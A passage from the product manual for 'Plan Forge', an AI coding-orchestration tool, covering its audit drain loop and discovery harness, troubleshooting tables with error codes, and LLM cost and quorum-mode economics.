Repeat until convergence or maxRounds (default 5)
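
The steps above can be sketched as a bounded loop. This is a synchronous simplification with injected `scan`, `route`, and `spawnWorker` callbacks; the option names, the `id` field used to recognize repeat findings, and the reading of convergence as "a scan with no previously unseen findings" are all assumptions rather than the documented `runTemperingDrain(opts)` contract.

```javascript
// Hypothetical sketch of the drain loop.
function runDrainSketch({ scan, route, spawnWorker, maxRounds = 5 }) {
  const seen = new Set();
  let round = 0;
  while (round < maxRounds) {
    round += 1;
    // Steps 1 and 4: scan (or re-scan) and keep only findings not seen before.
    const fresh = scan().filter((f) => !seen.has(f.id));
    if (fresh.length === 0) return { converged: true, rounds: round };
    for (const finding of fresh) {
      seen.add(finding.id);
      const routed = route(finding);                  // step 2: triage
      if (routed.lane === "bug") spawnWorker(routed); // step 3: fix bug-lane only
    }
  }
  return { converged: false, rounds: maxRounds };     // step 5: round limit hit
}
```

Injecting the three callbacks mirrors the injectable `spawnWorker` mentioned above and lets the loop be exercised without a live server.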

Activation Surface

Configuration lives in .forge.json#audit:

{
  "audit": {
    "mode": "off",
    "maxRounds": 5,
    "autoThresholds": {
      "minFilesChanged": 5,
      "minDaysSinceLastDrain": 3,
      "requireFindings": true
    },
    "environments": ["dev", "staging"],
    "forbidProduction": true
  }
}

Mode	Behavior
`"off"` (default)	No automatic drain. Manual only via `pforge audit-loop`.
`"auto"`	Evaluates thresholds after plan completion. Fires only if change-surface signals trip.
`"always"`	Dispatches unconditionally after every plan completion.

CLI Usage

# Manual one-shot (ignores config, always runs)
pforge audit-loop

# Respect .forge.json#audit config
pforge audit-loop --auto

# Dry run with custom rounds
pforge audit-loop --dry-run --max=3

# Target staging
pforge audit-loop --env=staging

MCP Tools

forge_tempering_drain, programmatic drain loop access. Accepts project, maxRounds, scanners, dryRun, env.
forge_triage_route, route a single finding through the classifier. Returns { lane, payload, confidence }.

Dashboard

The audit-loop toggle in the dashboard persists to .forge.json#audit; it is not session-scoped. This matches the pattern used by Forge-Master prefs (.forge/fm-prefs.json) and the quorum advisory toggle.

Discovery Harness Implementation

The discovery harness is the engine that turns a running dev server into a stream of structured findings. It uses a 4-pass build sequence (crawl, wrap, execute, auto-smelt) to close the loop between bug discovery and bug resolution, with no human triage required for bug-lane findings.

Discovery Harness 4-pass build sequence: Pass 1 (Harness) crawls routes with Node + Playwright, Pass 2 (Wrapper) transforms JSON into Crucible smelts, Pass 3 (Execute) runs slices with Tempering, Pass 4 (Auto-smelt) converts failures into new smelts — Discovery Harness 4-pass build sequence

Pass 1 — Harness (Node + Playwright)

A headless Playwright browser crawls every route exposed by the dev server. For each page the harness records HTTP status, document title, h1 text, word count, placeholder markers (e.g. Coming soon, TODO), broken links, and client-shell detection for hydrated SPAs. Results are written as structured JSON to .forge/audits/.

Representative example: a marketing site with 47 routes produces 12 findings on its first pass: three placeholder headings, two broken anchor links, four pages returning non-200 status codes, and three pages with zero meaningful content.

Pass 2 — Wrapper (JSON → Crucible)

Each finding from Pass 1 is transformed into a Crucible smelt via forge_crucible_submit. The wrapper applies severity triage, routing findings through the three-lane classifier (bug, spec, classifier) before packaging them as structured smelt input with enough context for the hardener to produce actionable plan slices.

Pass 3 — Execute (Slices + Tempering)

The hardened plan runs slice-by-slice through forge_run_plan. Each slice carries its own validation gate and Tempering re-audit. LiveGuard hooks fire between slices, catching regressions before they compound.

Pass 4 — Auto-smelt (Closed Loop)

Any Tempering failures from Pass 3 are converted into new smelts via forge_tempering_drain and re-entered into the bug registry, with no human triage required. The loop iterates until convergence (zero new findings) or the configured maxRounds limit (default 5) is reached.

Further reading. For a real-world walkthrough of the 4-pass sequence applied to a production Next.js site, see the blog post The Loop That Never Ends.

Three-Lane Triage Funnel

Every finding from the discovery harness gets sorted into one of three lanes by the wrapper before reaching Crucible. Lane assignment determines whether a human ever sees the finding, what shape the resulting plan slice takes, and how the loop closes. The funnel is the difference between an audit that produces 100 PRs nobody reads and an audit that produces 5 PRs that ship.

Bug Lane — Auto-smelt to Bug Registry

Findings with high confidence and a clear remediation pattern (broken links, non-200 status codes, hydration failures) drop into the bug lane. The wrapper packages them as Crucible smelts with severity attached, then the auto-smelt pass converts them into entries in the bug registry. No human triage is required; the loop closes automatically.

Representative example: a 4-pass run finds 8 broken anchor links across the docs. All 8 land in the bug lane as a single batch smelt with severity medium, generate one plan slice that fixes them together, and close themselves out via tempering re-audit.

Spec Lane — Escalate to Human Spec Author

Findings that imply missing or ambiguous spec content (placeholder headings like "Coming soon", pages with zero meaningful content) drop into the spec lane. These can't be auto-fixed because the harness doesn't know what content should be there, only that something is missing. The wrapper escalates them as Crucible smelts requiring human input before they can be hardened into plan slices.

Representative example: the harness finds a route titled "Pricing, Coming soon" with 12 words of body content. Spec lane escalates this to a human as a Crucible smelt requesting a draft of the actual pricing tier copy. The human responds in the Crucible interview funnel, the wrapper hardens the response into a plan slice, and the loop resumes.

Classifier Lane — Refine the Classifier

Findings the classifier can't confidently sort (novel signals, contradictory evidence, low confidence scores) drop into the classifier lane. Rather than guess, the wrapper records the finding plus the classifier's confusion signal as a Crucible smelt targeting the classifier itself. Over time, classifier-lane volume should drop as the classifier learns from each handoff.

Representative example: the harness finds a 200 OK route with full content, but the document title is just "."; the classifier hasn't seen this signal before. Classifier lane creates a smelt asking the maintainer "should pages with single-character titles be flagged as defective?" The answer becomes a new classifier rule for the next run.

Finding-type to lane mapping

Finding type	Default lane	Why
Non-200 HTTP status	Bug	Unambiguous failure, fix is mechanical
Broken anchor / link	Bug	Target either exists or it doesn't; trivial to verify
Placeholder marker (TODO, Coming soon)	Spec	Implies missing content, not broken content
Zero meaningful content	Spec	Page exists but says nothing, needs human authoring
Hydration failure (SPA crashes without JS)	Bug	Build / config defect, not a content gap
Novel signal / low confidence	Classifier	Classifier can't sort; ask the maintainer
Mixed signals (multiple conflicting findings)	Classifier	Pre-empt a wrong auto-smelt by asking first
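
The table above amounts to a lookup with a cautious default. In the sketch below the finding-type keys are invented labels for the table rows, and sending unlisted types to the classifier lane follows the "novel signal" row; the wrapper's real type names are not shown in this chapter.

```javascript
// Hypothetical sketch: keys are illustrative labels, not real type names.
const DEFAULT_LANE = new Map([
  ["non-200-status", "bug"],
  ["broken-link", "bug"],
  ["placeholder-marker", "spec"],
  ["zero-content", "spec"],
  ["hydration-failure", "bug"],
  ["low-confidence", "classifier"],
  ["mixed-signals", "classifier"],
]);

function defaultLane(findingType) {
  // Anything the table does not list is treated as a novel signal.
  return DEFAULT_LANE.get(findingType) ?? "classifier";
}
```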

What gets auto-smelted. Only the bug lane runs autonomously. Spec and classifier lanes always require a human in the loop, by design. The point of the funnel is to keep humans focused on what only humans can answer (intent, scope, novel signals), not on triaging mechanical defects the harness already understands.

For a worked example of how the bug lane closes a real defect end-to-end, including the multi-model quality patterns that catch issues a single model misses, see Quorum Quality Examples in Chapter 14.

Design Decisions

Classifier proposals are local files: Written to .forge/audits/ as JSON artifacts. GitHub PR creation is a deferred enhancement.
spawnWorker is injectable: Consistent with visual-diff quorum and bug classifier patterns. Already in the function signature.
Production is immutably forbidden: forbidProduction: true cannot be overridden via config; it's hardcoded in auto-activate.mjs.



Chapter 15

Troubleshooting

"Something's wrong." Find the answer fast.

Every tool breaks eventually. The question is whether you have a diagnostic path or just a prayer. Start with pforge smith; it catches 80% of issues in 5 seconds.

Key terms: Glossary defines every Plan Forge term. If you see "scope contract," "validation gate," "slice," or "applyTo" and aren't sure what they mean, check there first.

Trying to do something, not fix something? This chapter answers "why is X broken?" If the question is "how do I X?", for example "how do I lower the cost of a run" or "how do I add a custom skill", jump to Appendix S — How Do I…? Task Index. It maps verbs to chapters.

Diagnostic Tools

Troubleshooting decision tree: start with pforge smith, branch to execution, guardrails, dashboard, or setup issues — Figure 15-1. Troubleshooting decision tree

Tool	What It Checks	When to Use
`pforge smith`	Environment, VS Code config, setup health, version	First thing when anything seems off
`pforge check`	Setup file existence and validity	After setup or update
`forge_diagnose({ file })` (MCP tool)	Multi-model bug investigation on a specific file	When a slice fails and you can't see why, invoke from Copilot Chat

What a healthy `pforge smith` looks like

If you've never run it, here's the shape of the output to compare against. Anything red or marked FAIL is a real problem; WARN usually means an optional extension or integration isn't installed.

Terminal, expected output

$ pforge smith

Plan Forge v3.12.0, forge diagnostic

Environment
  OS                Windows 10.0.22631  OK
  Shell             PowerShell 7.4.1    OK
  Node              v20.11.0            OK  (≥ 20 required)
  Git               2.42.0              OK  (≥ 2.30 required)

Forge layout
  .github/prompts            22 files   OK
  .github/instructions       22 files   OK
  .github/agents             14 files   OK
  .github/hooks               7 files   OK
  .github/skills             12 files   OK
  docs/plans                  5 files   OK
  .forge/config.json         present    OK

MCP server
  pforge-mcp/server.mjs      present    OK
  Port 3100                  free       OK
  Port 3101 (WS hub)         free       OK

Agent adapters
  copilot   .vscode/mcp.json  OK
  claude    .mcp.json         not installed   WARN (run setup with --agent claude)
  cursor    .cursor/mcp.json  not installed   WARN
  codex     .codex/mcp.json   not installed   WARN

Result: 15 OK, 3 WARN, 0 FAIL - forge is healthy

Read it from the bottom. The Result: line is the headline. If FAIL = 0 you're fine to keep working. WARNs are reminders, not blockers.

Agent Isn't Following Guardrails

Symptom	Cause	Fix
AI ignores coding standards	Instruction files not loading	Check `applyTo` pattern matches the file you're editing. Run `pforge smith` to verify file counts.
Wrong instructions loading	`applyTo` glob too broad	Narrow the pattern, use `/auth/` instead of `**`
Guardrails load but AI ignores them	Context budget exceeded	Reduce `copilot-instructions.md` to <80 lines. Remove `applyTo: '**'` from non-essential files.
Project Principles not enforced	`PROJECT-PRINCIPLES.md` missing	Run the project-principles prompt. The instruction file activates only when this file exists.

Plan Execution Fails

Symptom	Cause	Fix
Gate fails with build errors	Code doesn't compile	Fix the build error, then `pforge run-plan --resume-from N`
Gate fails, tests regress	New code broke existing tests	Fix the regression. Check if scope contract is too broad.
Slice times out	Context window exhausted or model overloaded	Split the slice into smaller chunks. Try a different `--model`.
Model returns error	API key invalid or rate limited	Check `XAI_API_KEY` / `OPENAI_API_KEY` env vars. Wait for rate limit reset.
Scope violation detected	AI touched forbidden files	The PreToolUse hook should catch this. If not, tighten the Scope Contract.
Escalation exhausted	All models in chain failed	Review the slice, it may be too complex. Break into sub-slices or simplify gates.

Dashboard Won't Load

Symptom	Cause	Fix
Connection refused on :3100	Server not running	`node pforge-mcp/server.mjs`
Port already in use	Another process on 3100	`node pforge-mcp/server.mjs --port 4100` or kill the conflicting process
Blank page loads	Missing `node_modules`	`cd pforge-mcp && npm install`
WebSocket disconnects	Firewall or proxy blocking :3101	Allow port 3101, or set `WS_PORT` env var
No data in Runs/Cost tabs	No execution history yet	Run a plan first: `pforge run-plan`

Setup Failed

Symptom	Cause	Fix
"Preset not found"	Typo in preset name	Valid presets: dotnet, typescript, python, java, go, swift, rust, php, azure-iac
Permission denied	Read-only directory or no git access	Check file permissions. Run from a writable directory.
Existing files conflict	Previous setup exists	Use `-Force` flag to overwrite, or `pforge update` for selective updates
Wrong files installed	Incorrect preset for your stack	Re-run: `.\setup.ps1 -Preset <correct-preset> -Force`

Costs Are Too High

Strategy	Savings	How
Use cheaper execution model	50–70%	Set `modelRouting.execute` to a smaller model
Reserve expensive model for review	30–50%	`modelRouting.review: "claude-opus-4.6"`
Raise quorum threshold	20–40%	`--quorum-threshold 8` (fewer slices trigger consensus, see scoring rubric)
Reduce context per slice	10–20%	Use targeted `Context:` lists (see Chapter 4)
Preview before running	N/A	`pforge run-plan --estimate` or `forge_estimate_quorum` (compares all four modes)

Grok Image Generation Crashes Session

xAI Grok Aurora returns JPEG bytes regardless of requested format. If raw bytes with wrong MIME type enter the conversation history, the session becomes unrecoverable.

Current mitigations: The MCP tool returns text-only responses (file path + metadata, never raw base64). The generateImage() function detects actual format via magic bytes and converts using sharp. Sessions should be safe, but if you encounter the MIME mismatch error, start a fresh session.

Safe workflow: Use .jpg extensions (matches Grok's native output), generate art in dedicated sessions, or use the REST API: POST /api/image/generate.

Common Error Messages

Looking for the contract, not the fix? Every exit code, MCP error code, and REST status Plan Forge emits is documented in Appendix X — Errors & Exit Codes. This table maps symptom → fix; the appendix maps code → meaning.

Error	Cause	Fix
`No .forge.json found`	Not in a Plan Forge project	Run `pforge init` or `setup.ps1`
`templateVersion mismatch`	Framework files outdated	`pforge update`
`No API key configured`	Missing env var for image/analysis	Set `XAI_API_KEY` or `OPENAI_API_KEY`
`Plan parsing failed`	Malformed plan file	Check for missing `## Execution Slices` section or broken markdown
`Gate command failed (exit 1)`	Build or test failure	Fix the code, then `--resume-from N`
`DRIFT DETECTED`	Forbidden file modified	Revert the forbidden change, re-run the slice
`CRITICAL_FIELDS_MISSING` v2.82.1	Crucible finalize blocked, missing build-command, test-command, scope, gates, forbidden-actions, or rollback	Call `forge_crucible_preview` for `criticalGaps[]`, then continue the interview
`PLAN_ALREADY_EXISTS` v2.82.1	Crucible finalize refuses to overwrite hand-authored `docs/plans/Phase-NN.md`	Read both files (existing plan + `.crucible-draft.md`), then re-finalize with `overwrite: true` if you really mean it
`ASK_QUESTION_MISMATCH` v2.82.1	Client passed a stale `questionId` to `forge_crucible_ask`	Re-fetch state via `forge_crucible_preview`, retry with the current question id
`QUORUM_ALL_FAILED` v2.78	All quorum models timed out (60s each) or errored	Check API keys / network; retry. Consider `--quorum=speed` if flagship models are unavailable. See the Multi-agent quorum reference.
`NO_REASONING_MODEL`	Forge-Master has no model configured and no API key found	`gh auth login` for zero-key path, or set `ANTHROPIC_API_KEY` / `OPENAI_API_KEY` / `XAI_API_KEY`, or set `forgeMaster.reasoningModel`
Subprocess `STATUS_CONTROL_C_EXIT (0xC000013A)` v2.81	Worker process was killed by signal mid-slice	Slice is now correctly marked failed (not silently passed). Check `statusReason`, then `--resume-from N`
`slice-orphan-warning` event v2.82.1	Failed slice's worker deliverables were staged but not committed	See `.forge/runs/<runId>/orphans-slice-<N>.json` for copy-paste recovery commands

Crucible Finalize Fails v2.82.1+

The Crucible critical-fields gate refuses to draft TBD-laden plans. If finalize keeps returning CRITICAL_FIELDS_MISSING, the recovery path is:

forge_crucible_preview { id } returns criticalGaps: [{ field, reason, hint }, …]
For each gap, the next call to forge_crucible_ask queues a question that targets that field
Build/test command questions auto-fill suggestions via inferRepoCommands; usually you just confirm
Once all gaps are resolved, finalize succeeds

If the gate is blocking on something you genuinely don't need (rare, the gate exists for good reason), the escape hatch is --manual-import on a hand-authored plan. See Chapter 5 — Enforcement Gate.

Forge-Master Misroutes Intent

Forge-Master classifies prompts into operational, troubleshoot, build, advisory, or offtopic. Misroutes happen most often when:

Stage 1 keyword scorer didn't match: check the via field in the response. If "keyword", try a more keyword-rich phrasing ("status of …", "why did … fail", "should we …")
Embedding cache is cold: new project, no prior classifications. Hit rate climbs after 10–20 turns. Check GET /api/forge-master/cache-stats
Router model is too small: the default grok-3-mini is fine for most prompts, but quirky vocabulary may need grok-4 or gpt-4o-mini. Override via forgeMaster.routerModel in .forge.json
Quorum advisory not firing on "auto": requires lane=advisory + autoEscalated=true + fromTier=high + confidence≥medium. Use "always" to remove gating during testing
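
The gating rule in the last item can be read as a single predicate. A minimal sketch, assuming the classification result exposes the four fields under the names used above and that confidence levels order as low < medium < high (both are assumptions; the real Forge-Master response shape may differ):

```javascript
// Hypothetical ordering of confidence levels; the manual only names "medium".
const CONFIDENCE_RANK = { low: 0, medium: 1, high: 2 };

// Returns true when a quorum advisory would fire under the rule described above.
// `setting` is "auto" or "always"; any other value is treated as "never fire".
function quorumAdvisoryFires(setting, result) {
  if (setting === "always") return true; // gating removed, e.g. during testing
  if (setting !== "auto") return false;
  const rank = CONFIDENCE_RANK[result.confidence];
  return (
    result.lane === "advisory" &&
    result.autoEscalated === true &&
    result.fromTier === "high" &&
    rank !== undefined &&
    rank >= CONFIDENCE_RANK.medium
  );
}
```

If the advisory is not firing on "auto", checking each of the four conditions in turn usually shows which one is unmet.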

See Forge-Master chapter — Troubleshooting for the full list.

Host-Aware Routing Confusion v2.82+

Host-aware routing detects which IDE / CLI host you're running Plan Forge from (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, bare terminal) so you don't silently double-pay against your non-Copilot subscription when calling gpt-* models. If you're seeing surprising routing behavior:

Symptom	What's happening	Override
"My `gpt-*` calls cost more on Claude Code than VS Code"	Default `auto` mode prefers direct OpenAI API on non-Copilot hosts (honors your subscription)	Set `routing.hostPreference: "gh-copilot"` in `.forge.json` to force Copilot subscription billing
"Quorum dropped `gpt-*` from the run"	You're on a non-Copilot host AND `OPENAI_API_KEY` is unset AND `routing.hostPreference` is `"drop"`	Set the API key, or change preference to `"auto"` / `"gh-copilot"`
"Quorum pre-run summary table shows different billing per model"	Working as intended, the new table shows host + per-model billing surface so you can see spend distribution before dispatch	None, this is a feature, not a bug

Errors & Exit Codes

If a script needs to react to a Plan Forge failure programmatically, branch on the exit code (CLI / orchestrator) or the named error code (MCP tools / REST). These are stable across releases; new failure modes get new codes rather than reusing existing ones.

Layer	Returns	Branch on
`pforge` CLI	POSIX exit code	`0` success · `1` generic failure · `2` environment refusal (not in git repo, update-check failed, audit had no scanners)
`pforge run-plan`	Exit code + `statusReason` in JSON	`0`=completed / completed-with-warnings · `1`=failed / aborted. `statusReason` narrows it: `gate-failed`, `drift-detected`, `quorum-all-failed`, etc.
MCP tools (`forge_*`)	`{ ok, code, error }` envelope	`ok: false` with a named `code`, e.g. `NO_API_KEY`, `CRITICAL_FIELDS_MISSING`, `QUORUM_ALL_FAILED`, `PLAN_NOT_FOUND`
REST (`POST /api/…`)	HTTP status + JSON body	`400` bad body · `404` missing · `409` state conflict (`ERR_UPDATE_DURING_RUN`) · `429` rate limited (use `retryAfterMs`) · `500` internal
OS subprocess (worker, gate)	Native exit code, surfaced via `statusReason`	`0xC000013A` Windows Ctrl+C · `130/137/143` POSIX signals. Mapped to `worker-signaled`.
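
As an illustration of branching on named codes rather than message text, here is a small sketch. It assumes the MCP envelope and REST body have the shapes listed in the table, and that `retryAfterMs` is a field of the 429 JSON body; the action names and the 1000 ms fallback are made up for this example.

```javascript
// Map an MCP tool envelope ({ ok, code, error }) to a coarse next action.
// The action names are illustrative, not part of Plan Forge.
function actionForEnvelope(envelope) {
  if (envelope.ok) return "continue";
  switch (envelope.code) {
    case "NO_API_KEY":
      return "configure-key";
    case "CRITICAL_FIELDS_MISSING":
      return "continue-interview";
    case "QUORUM_ALL_FAILED":
      return "retry";
    case "PLAN_NOT_FOUND":
      return "fix-plan-path";
    default:
      return "inspect-error";
  }
}

// Decide how long to wait before retrying a REST call, or null to not retry.
function retryDelayMs(status, body) {
  if (status === 429) return body.retryAfterMs ?? 1000; // fallback is an assumption
  return null;
}
```

Because codes are stable across releases, a `default` branch like the one above is enough to stay forward-compatible with codes added later.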

Full contract: every exit code, every named error code, every error event, plus copy-paste Bash and PowerShell CI recipes, see Appendix X — Errors & Exit Codes.

Subsystem catalog: Appendix Z — Failure-Mode Catalog complements this chapter. Where troubleshooting is symptom-driven (you see a red output and look up what it means), Appendix Z is subsystem-organised — browse by gate, quorum, watcher, OpenBrain, snapshot, model-pool, or hub to see every known failure mode with its symptom, cause, and fix triple.

Getting Help

GitHub Issues: github.com/srnichols/plan-forge/issues
Contributing: View contributing guide on GitHub for PR guidelines
Security: View security policy on GitHub for vulnerability reporting

📄 Full reference: FAQ, Multi-Agent Setup — GitHub Copilot

A glowing brass balance scale on the workbench at the Plan Forge shop, one pan stacked with gold coins and a softly glowing amber ingot, the other pan balanced with a small parchment receipt and a tiny finished iron piece, a wooden abacus and an open leather ledger book to the side

Act II, Forge · Chapter 31

Cost & Economics

How Plan Forge prices LLM calls, where token costs come from, the three sources of truth, per-quorum-mode economics, cost-effective workflow patterns, and the anti-lock-in commitments that keep your provider bill yours, never marked up, never proxied, never withheld.

Never hand-compute quorum costs in chat. Hand-computed quorum estimates have been observed to overshoot reality by an order of magnitude. Always call forge_estimate_quorum for projections and forge_cost_report for actuals. If you're building a UI with a quorum picker, populate it from forge_estimate_quorum; do not invent dollar amounts.

Orientation

Plan Forge has no Plan Forge bill. It has your provider bill, plus the orchestrator's bookkeeping to tell you what fraction of that bill belongs to which slice, which plan, and which model. Three things follow from that:

Bring-your-own-key. Plan Forge calls Anthropic, OpenAI, Google, and xAI directly using your keys. There is no relay, no proxy, no aggregator endpoint. (Azure OpenAI is also supported, same direct call, your AOAI deployment.)
No markup. The orchestrator records what the provider charged you. Plan Forge adds zero margin. The numbers in forge_cost_report are the numbers on your provider invoice.
Per-slice attribution. Every LLM call is tagged with the run id, slice number, role (worker / reviewer / quorum responder / forge-master / etc.), and provider. You can answer "which slice cost the most" from the audit trail, not from guessing.

Three sources of truth

Cost numbers in Plan Forge come from exactly three places. Knowing which is which prevents the common confusion between "what a slice will cost" and "what it did cost."

Source	Answers	How to read it
`MODEL_PRICING` table (`pforge-mcp/cost-service.mjs`)	"What does a given model charge per million input / output / cache tokens?"	Static table, updated when providers publish new prices. Each entry cites its `_source` URL with date. Cache, flex, priority, and AOAI deployment multipliers are encoded alongside the base rates.
`forge_estimate_quorum` · `forge_estimate_slice`	"What will this plan / slice cost before I run it?"	Token-aware projections. Walks each slice, projects worker tokens by file size + scope, projects quorum panel by mode. Returns four-mode breakdown (auto / power / speed / disabled) for plans.
`forge_cost_report`	"What did Plan Forge actually charge to my providers?"	Aggregates `.forge/cost-history.json`, one record per LLM call with run id, slice, role, model, tokens, ticks (xAI exact-cost), and dollar amount. Roll up by day / month / model / role.

Why three? The pricing table is the contract (rates per token), the estimate tools are the forecast (rates × projected tokens), and the cost report is the actual (rates × observed tokens with cache hits, retries, and provider rounding folded in). Estimates and actuals will differ; the cost report is always authoritative.
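
The "rates × tokens" relationship is simple enough to sketch. The two rates below are the per-1M-token figures this chapter quotes for `claude-opus-4.7` and `gpt-5-nano`; the object layout and field names are assumptions and do not mirror the real `MODEL_PRICING` table. This is for intuition only; projections should still come from `forge_estimate_quorum`.

```javascript
// Per-1M-token rates in USD, as quoted in this chapter. The field names are
// illustrative; the real MODEL_PRICING entries may be structured differently.
const RATES = {
  "claude-opus-4.7": { inputPerM: 5, outputPerM: 25 },
  "gpt-5-nano": { inputPerM: 0.05, outputPerM: 0.4 },
};

// rates × tokens, with no cache, tier, or deployment multipliers applied.
function baseCostUsd(model, inputTokens, outputTokens) {
  const rate = RATES[model];
  if (!rate) throw new Error(`no rate for ${model}`);
  return (inputTokens * rate.inputPerM + outputTokens * rate.outputPerM) / 1e6;
}
```

For 10,000 input and 2,000 output tokens this gives $0.10 on `claude-opus-4.7` and about $0.0013 on `gpt-5-nano`, before any multipliers.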

Cost drivers

The variables that move your bill, ranked roughly by how much leverage they have.

Driver	Range	How to manage it
Model tier	~60–100× spread between flagship and nano (`claude-opus-4.7` $5/$25 vs `gpt-5-nano` $0.05/$0.40 per 1M tokens)	Use cheaper models for code-search / classification / routing. Reserve flagships for hard reasoning slices. The `auto` quorum mode does this automatically.
Token volume per slice	1K (small CRUD) to 200K (large refactor with broad context)	Tighten scope contracts. A slice that touches 4 files costs ~10× less than one that touches 40, even with the same logic. Split fat slices.
Quorum panel size	1 model (disabled) to 5+ models (power mode)	Use `auto` by default; opt into `power` only for high-stakes or low-confidence decisions. See per-quorum-mode economics.
Cache reuse	1.0× (no cache) down to 0.10× (Anthropic / OpenAI cache read)	Plan Forge sends the same system blocks across slices in a run, which providers cache. No action needed; just don't restart the run between slices unnecessarily.
Reasoning tokens (o-series, GPT-5 reasoning)	Often 5–20× visible output	Reasoning tokens are billed at the output rate and already counted in `output_tokens`; don't double-count when estimating. Use reasoning models only when the slice needs them.
Retries & escalation	1× (clean pass) to 3–5× (full escalation chain)	Tighten validation gates so first-pass success rate climbs. The Inner Loop's reviewer calibration is designed for this, see Chapter 14 deep dive — The Inner Loop.
AOAI deployment type	1.0× (global / provisioned) to 1.1× (data-zone / regional)	Use global Azure OpenAI deployments unless data-residency requires otherwise. The 10% uplift is encoded in `aoai_deployment_type_multiplier`.
Priority / flex tier (GPT-5.x)	0.5× (flex) to 2.0× input / 1.5× output (priority)	Flex is fine for batch / offline runs; priority is rarely worth it for plan execution. Default tier is standard.

Estimate vs actuals

Before running a plan, get a projection. After running, audit the actual.

Before the run: `forge_estimate_quorum`

// MCP
forge_estimate_quorum({ plan: "docs/plans/Phase-NN.md" })

// REST
POST /api/tool/forge_estimate_quorum
{ "plan": "docs/plans/Phase-NN.md" }

// CLI
pforge run-plan --estimate docs/plans/Phase-NN.md

Returns a per-slice token projection plus four-mode totals:

{
  "plan": "Phase-NN",
  "slices": [
    { "n": 1, "name": "Add user_profiles table", "projectedTokens": 8400, "modelTier": "mid", … },
    …
  ],
  "modes": {
    "auto":     { "totalUsd": 0.42, "breakdown": { /* per-model */ } },
    "power":    { "totalUsd": 1.85, "breakdown": { /* per-model */ } },
    "speed":    { "totalUsd": 0.18, "breakdown": { /* per-model */ } },
    "disabled": { "totalUsd": 0.09, "breakdown": { /* per-model */ } }
  }
}

The picker UI in the dashboard uses exactly this payload. If you're building your own UI, populate it the same way; the four-mode table is the single source of truth for "what does this cost?"
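
A minimal sketch of populating a picker from that payload, assuming only the `modes.<name>.totalUsd` fields shown in the sample response above (the `label` format is invented for this example):

```javascript
// Turn the `modes` object from a forge_estimate_quorum response into picker
// rows, cheapest first. Only `totalUsd` is read; `breakdown` is ignored here.
function pickerRows(estimate) {
  return Object.entries(estimate.modes)
    .map(([mode, { totalUsd }]) => ({
      mode,
      totalUsd,
      label: `${mode}: $${totalUsd.toFixed(2)}`,
    }))
    .sort((a, b) => a.totalUsd - b.totalUsd);
}

// Same totals as the sample response above.
const sample = {
  modes: {
    auto: { totalUsd: 0.42 },
    power: { totalUsd: 1.85 },
    speed: { totalUsd: 0.18 },
    disabled: { totalUsd: 0.09 },
  },
};
console.log(pickerRows(sample).map((row) => row.label).join("\n"));
```

The dollar amounts are passed through untouched, which is the point: the UI formats numbers but never computes them.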

After the run: `forge_cost_report`

// MCP
forge_cost_report({ runId: "run-2026-05-18-091234" })   // one run
forge_cost_report({ scope: "month" })                    // current month
forge_cost_report({ scope: "month", groupBy: "model" })  // monthly by model

// REST
GET /api/cost/report?runId=…
GET /api/cost/report?scope=month&groupBy=model

Returns the actual provider-billable amounts pulled from .forge/cost-history.json. Group by model, role, day, or slice. For runs that included xAI calls, the dollar amounts use the provider's exact-cost ticks (1 tick = $1×10^-10) rather than multiplier math; what you see is what xAI billed.
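
The tick conversion is a single division. A small sketch, using the tick size stated above (the function name is hypothetical):

```javascript
const TICKS_PER_USD = 1e10; // 1 tick = $1×10^-10

// Convert xAI exact-cost ticks to dollars. Dividing by 1e10 (rather than
// multiplying by 1e-10) avoids one extra rounding step in floating point.
function ticksToUsd(ticks) {
  return ticks / TICKS_PER_USD;
}
```

For example, 7,800,000,000 ticks corresponds to $0.78.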

Per-quorum-mode economics

Quorum mode is the biggest single cost lever after model tier. Plan Forge ships four modes:

Mode	Panel	Threshold	Cost shape	When
`auto` (default)	Dynamic: 2–3 models picked by intent class	Majority of responders	~3× single-model	Most plans. Cost-effective and adequate for most decisions.
`power`	4–5 flagship models (Opus, GPT-5.5, Gemini Pro, Grok 4.x)	5	~8–12× single-model	Architectural decisions, plan hardening (Session 1), high-stakes refactors.
`speed`	4–7 fast / cheap models (mini / nano tier)	7	~1.5–3× single-model	High-volume CI runs, batch classifications, when latency > depth.
`disabled` (`--no-quorum`)	1 model	n/a	1× (baseline)	Solo dev, trivial slices, dev-loop iteration.

Picker UIs MUST be tool-backed. If you're showing a quorum mode chooser with dollar amounts, those numbers come from forge_estimate_quorum, never from chat math. The ratios above are approximate and shift with model availability; the tool always returns current numbers.

Cost-effective workflows

Patterns that have been observed to reduce spend without hurting outcomes.

Right-size slices

A slice that costs $0.50 to succeed is dramatically cheaper than one that costs $3 to fail and $2 to retry. The smaller the slice, the higher the first-pass success rate and the lower the total cost. The Crucible's plan-hardening pass (Session 1) is designed to split slices that are too fat; trust it. Target: 1–4 files per slice, 1 conceptual change per slice.

Let auto-quorum route models

The auto mode classifies each slice into "search-like" / "transform-like" / "reason-like" and routes to a model tier accordingly. Hardcoding a flagship via --model often costs 10× more for no measurable quality gain on routine slices.

Tighten validation gates

Loose gates pass bad work; bad work triggers retries; retries cost money. Strict, fast-to-execute gates (the Inner Loop, reviewer calibration target ~90–95% precision) catch failures on the first attempt and avoid the retry tax. The Inner Loop's forge_validate and forge_sweep are designed for exactly this trade.

Don't fight the cache

Provider caches give 10× savings on cached input. Plan Forge structures prompts so the system block, scope contract, and slice instructions are stable across slices in a run; providers cache the prefix automatically. Restarting the orchestrator between slices throws this away. Run plans end-to-end when you can.

Quorum only when it matters

power mode at the wrong moment is the most common over-spend. Reserve it for: plan hardening (Session 1), architectural decisions, slices flagged with high blast radius. Routine execution, even of moderately complex slices, works fine on auto or disabled.

Anti-lock-in posture

Plan Forge's economic story is simple: your bill stays yours. Concretely:

Commitment	What it means
BYOK across providers	Anthropic, OpenAI, Google, xAI, Azure OpenAI, same code path, your keys. Switch providers by changing env vars; no migration tool needed.
No proxy layer	The orchestrator calls the provider's public API directly. There is no Plan Forge endpoint in the data path. Outage isolation: Plan Forge can't take you down, only your provider can.
No usage telemetry	Plan Forge does not phone home with your token counts. The cost history lives in `.forge/cost-history.json` on your machine and stays there unless you explicitly export it.
Symmetric provider treatment	Adding a new provider takes ~30 lines in `pforge-mcp/cost-service.mjs` + a route adapter. No provider is privileged; the pricing table is open-source.
Open-source pricing table	`MODEL_PRICING` is in the repo with `_source` URLs. If you don't believe a rate, click the source. If a rate is wrong, file a PR.
Easy export	`forge_cost_report` exports JSON or CSV. Your run history is portable to any BI tool. No data lock-in.
